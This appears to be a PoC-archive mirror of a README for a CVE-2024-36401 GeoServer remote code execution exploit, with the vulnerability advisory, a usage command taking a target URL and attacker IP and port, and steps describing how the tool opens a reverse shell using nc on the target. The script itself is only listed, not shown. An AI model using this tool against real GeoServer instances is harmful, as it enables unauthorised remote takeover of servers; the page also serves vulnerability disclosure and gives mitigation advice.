Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-36401 PoC — Remote Code Execution (RCE) vulnerability in evaluating property name expressions in Geoserver

Source
https://github.com/bigb0x/CVE-2024-36401
Associated Vulnerability
Title:Remote Code Execution (RCE) vulnerability in evaluating property name expressions in Geoserver (CVE-2024-36401)
Description:GeoServer is an open source server that allows users to share and edit geospatial data. Prior to versions 2.22.6, 2.23.6, 2.24.4, and 2.25.2, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions. The GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types as well which makes this vulnerability apply to **ALL** GeoServer instances. No public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests. This vulnerability can lead to executing arbitrary code. Versions 2.22.6, 2.23.6, 2.24.4, and 2.25.2 contain a patch for the issue. A workaround exists by removing the `gt-complex-x.y.jar` file from the GeoServer where `x.y` is the GeoTools version (e.g., `gt-complex-31.1.jar` if running GeoServer 2.25.1). This will remove the vulnerable code from GeoServer but may break some GeoServer functionality or prevent GeoServer from deploying if the gt-complex module is needed.
Description
POC for CVE-2024-36401. This POC will attempt to establish a reverse shell from the vlun targets.
Readme
# RCE for CVE-2024-36401
POC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets.


![Banner](screens/screen.jpg)


## Overview

POC for CVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer. This POC is based on the security advisory by [phith0n](https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401).


## How it Works

1. Sets up a listener on your machine for incoming reverse shell from the target.
2. This POC will send a post request with the payloads.
3. Attempts to establish a shell on the target server.
4. This technique assumes nc is installed on the target.

## How to Use

This POC will attempt to establish a reverse shell from the vlun targets. This is aimed to work against vlun Linux targets. You will have to have a machine with published and accessiable IP in order to run this poc.


### Minimum Requirements

- Python 3.6 or higher
- `requests` library
  
To use this POC against a single target:
```sh
python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type
```

Help:
```sh
python3 CVE-2024-36401.py  -h

options:
  -h, --help  show this help message and exit
  -u U        Target, example https://target:8080
  -ip IP      Your IP, example 192.168.1.1
  -port PORT  Port, example 1337
  -type TYPE  Type, example sf:archsites
```

## How to Protect Your GeoServer Appliance

1- Disable WFS requests.

2- Secure your linux by configuring iptables to disable reverse connections, set default policies to drop all traffic, allow established and related connections, and permit only essential outbound traffic like DNS, HTTP, and HTTPS

3- Or upgrade to the latest version of GeoServer. 


## Contact

For any suggestions or thoughts, please get in touch with [me](https://x.com/MohamedNab1l).


## Disclaimer

I like to create my own tools for fun, work and educational purposes only. I do not support or encourage hacking or unauthorized access to any system or network. Please use my tools responsibly and only on systems where you have clear permission to test.
File Snapshot

 [4.0K]  /data/pocs/17ac9fbc0128242800ea403237e8d2dcbf39eacc
├── [8.9K]  cve-2024-36401.py
├── [2.1K]  README.md
└── [4.0K]  screens
    └── [259K]  screen.jpg

1 directory, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →